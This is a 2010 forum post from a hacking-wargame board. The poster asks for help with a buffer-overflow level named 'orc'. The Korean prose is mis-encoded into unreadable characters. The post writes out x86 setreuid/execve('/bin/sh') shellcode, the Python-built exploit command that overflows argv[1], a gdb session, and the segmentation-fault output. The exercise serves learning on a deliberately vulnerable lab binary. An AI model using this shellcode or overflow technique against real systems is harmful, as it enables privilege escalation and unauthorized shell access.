|
http://www.hackerschool.org/HS_Boards/zboard.php?id=bof_fellowship&no=119 [º¹»ç]
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
Á¦°¡ ÀÌ¿ëÇÏ´Â ½©ÄÚµåÀÔ´Ï´Ù
argv[1]¿¡ 44¹ÙÀÌÆ® + argv[2]ÀÇ ÁÖ¼Ò
argv[2]¿¡ ½©ÄÚµå ¸¦ ³Ö°í °ø°ÝÄڵ带 Â¥ºÃ½À´Ï´Ù
ÀÏ´Ü argv[2]ÀÇ ÁÖ¼Ò°ªÀ» º¸±âÀ§ÇØ
cp orc ./tmp ¸¦ ÇÏ°í
[goblin@localhost tmp]$ gdb -q orc
(gdb) b *main+10
Breakpoint 1 at 0x804850a
(gdb) run "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
Starting program: /home/goblin/tmp/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
Breakpoint 1, 0x804850a in main ()
±×ÈÄ x/10 $ebp ·Î argvÀÇ ÁÖ¼Ò¸¦ ¾ò°í
argv¾ÈÀ¸·Î µé¾î°¡¼ argv[2]ÀÇ ÁÖ¼Ò¸¦ ¾ò¾ú½À´Ï´Ù
ÁÖ¼Ò°¡ 0xbffffc23ÀÌ´õ±º¿ä
/home/goblin/tmp/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
±×·¸°ÔÇؼ ¿Ï¼ºµÈ ÄÚµåÀÔ´Ï´Ù
±×·±µ¥
[goblin@localhost tmp]$ /home/goblin/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa#?
Segmentation fault
[goblin@localhost tmp]$ /home/goblin/tmp/orc "`python -c 'print "a"*44+"\x23\xfc\xff\xbf"'`" "`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa#?
Segmentation fault (core dumped)
µµ´ëü ¾îµð°¡ À߸øµÈ°ÇÁö ¸ð¸£°Ú½À´Ï´Ù;
3Àϵ¿¾È Àâ°íÀִµ¥ ÁøÀüµµ¾ø°í..´ä´äÇÕ´Ï´Ù
¾Æ½Ã´ÂºÐ ÀÖÀ¸½Ã¸é ¾îµð°¡ À߸øµÇ¾ú´ÂÁö ÈùÆ®¶óµµ ÁÖ½Ã¸é °¨»çÇÏ°Ú½À´Ï´Ù
---
\xff°¡ Á¦´ë·Î ½ºÅÿ¡ Á¦´ë·Î µé¾î°¡Áö°¡ ¾Ê´Â´Ù´Â¸»À» µé¾ú´Âµ¥..
¿©Å²« ftzÇ®¶§ ret¿¡ ff°¡ Æ÷ÇÔµÈ ¿¡±×½© ÁÖ¼Ò¸¦ ½á³Ö¾îµµ ½ÇÇàÀº ¹®Á¦¾øÀÌ µÆ¾ú¾î¼..ÇÞ°¥¸®±â¸¸Çϳ׿ä |
Hit : 2861 Date : 2010/05/13 09:46
|
218, 
6/11 
